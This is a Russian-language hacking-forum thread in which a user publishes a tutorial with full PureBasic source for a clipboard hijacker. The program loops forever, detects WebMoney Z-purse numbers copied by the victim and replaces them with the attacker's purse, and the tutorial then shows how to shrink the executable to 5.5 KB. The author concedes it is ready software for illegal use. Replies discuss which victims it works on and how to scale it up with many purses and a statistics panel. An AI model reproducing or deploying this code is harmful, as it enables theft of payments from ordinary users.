Статьи Модификация буфера обмена -- это просто

Discussion in 'Статьи' started by FunOfGun, 18 Nov 2012.

1. FunOfGun

FunOfGun Elder - Старейшина

Reputations:
    124
    Надеюсь, не нарушу правила форума.

[Intro]

Предлагаю сегодня научиться подменять текст в буфере обмена. Сразу скажу, что я не призываю к кардерству или воровству, цель -- просто показать, насколько просто это может быть.
    Писать мы будет на PureBasic. Сейчас, возможно, кто-то сильно разочаровался, не зная, что PureBasic и бейсик, к которому привыкли многие, похожи только синтаксисом. "Под капотом" это абсолютно разные языки. PureBasic -- ничто иное, как простой транслятор бейсика в FAsm, что говорит о многом(асмовые вставки, небольшой размер выходной проги, указатели, отсутствие необходимости в рантаймах и т.д.).
    Один минус -- он платный. Но найти полную версию в гугле очень просто, а для наших целей подойдет и демка с офиц. сайта(http://www.purebasic.com/).

[Первый блин]

Итак, приступим. Я, пожалуй, сразу покажу код, а потом его прокоментирую.
    Code:
    EnableExplicit

Define.s myWMZ="Z123456789012"

Define regex=CreateRegularExpression(#PB_Any, "Z[0-9]+")

While #True
      Define curText.s=GetClipboardText()

If MatchRegularExpression(regex, curtext)
        SetClipboardText(myWMZ)
      EndIf 

Delay(100)
    Wend

На самом деле язык очень прост и освоить его по прилогаемому мануалу не проблема. Расмотрим только основные аспекты: первая строка -- команда компилятору предупреждать о необьявленный(объявление переменной -- define) переменных. Ее можно убрать, но не исключены опечатки в именах переменных, из-за которых вся логика программы может разрушиться.
    Далее идут объявления переменных, замечу только одно: суфикс ".s" указывает компилятору, что это строка, его можно прилепить как к директиве define(первый вариант), так и к имени переменной(второй).
    CreateRegularExpression -- функция, создающая регулярку(прошу прощения за плохой паттерн, это просто пример), для последующего использования.
    While #True ... Wend -- бесконечный цикл, в котором происходит все самое интересное: получение текста из буфера обмена(Define curText.s=GetClipboardText()), его сравнение с регуляркой(MatchRegularExpression(regex, curtext)) и если он подходит, то его замена нашим текстом(SetClipboardText(myWMZ)).
    Вот и все! Теперь давайте соберем нашу программку. Для этого в IDE шелкните по пункту меню Compiler(у меня англ. версия), далее выбираем пункт CreateExecutable(под опциями компилятора). Дальше все просто:).
    [Разбор полетов]

У меня получился файл размером в 67 кб. Многовато, не так ли? Давайте его уменьшим. Эксперементально выяснилось, что 60 кб тащит модуль работы с регулярками. Поэтому, если урать все упоминания о нем в коде, избвавимся от лишнего веса.
    Опять-таки сразу приведу код:
    Code:
    EnableExplicit

Define.s myWMZ="Z123456789012"

;Define regex=CreateRegularExpression(#PB_Any, "Z[0-9]+")

Procedure IsMatch(text.s)
      Define  i
      If Mid(text,1,1)="Z" And Len(text)=13
        For i=2 To Len(text)
          Define c=Asc(Mid(text, i,1))
          If Not(c>=Asc("0") And c<=Asc("9"))
            ProcedureReturn #False
          EndIf
        Next
        ProcedureReturn #True
      Else
        ProcedureReturn #False
      EndIf
    EndProcedure

While #True
      Define curText.s=GetClipboardText()

If IsMatch(curText) ;MatchRegularExpression(regex, curtext)
        SetClipboardText(myWMZ)
      EndIf 

Delay(100)
    Wend

Единственное отличие -- в закоментированных обращениях к regEx модулю и добавлению новой процедуры, которая выполняет тоже, что и регулярка. Кода, казалось бы, стало ольше, но скомпилировав прогу мы увидем, что ее размер 5,5 кб! И кто говорил, что бейсики прожорливы?
    [В заключение]

По-сути, это готовый софт для незаконных дел, но я все же надеюсь, что Вы будете благоразумны и не станете использовать эти знания во вред.

1 person likes this.
  2. vaddd

vaddd Member

Reputations:
    9
    сабж стар как мир.
    таким софтом ты сможешь обворовать лишь школьников, которые не смотрят имя получателя...
    да и кошельков тебе придется регать не один десяток под такие дела => нужно будет допилить еще нормальную админку, со статистикой подмены

3. vaddd

vaddd Member

Reputations:
    9
    вайт хацкиры рулят!

4. FunOfGun

FunOfGun Elder - Старейшина

Reputations:
    124
    Z-кошель просто пример, в остальном согласен.
    П.С. были когда-то слухи, что в LR подобным образом увели немалую сумму.
    Честность здесь не при чем. Статья писалась в основном для "пробы пера".

5. vaddd

vaddd Member

Reputations:
    9
    про лр верю, например я, получив кошелек через асю от селлера, копирую, оплачиваю
    название кошелька редко смотрю
    как и большинство наверное
    только заразить меня горазно сложнее чем всяких хомячков-школьников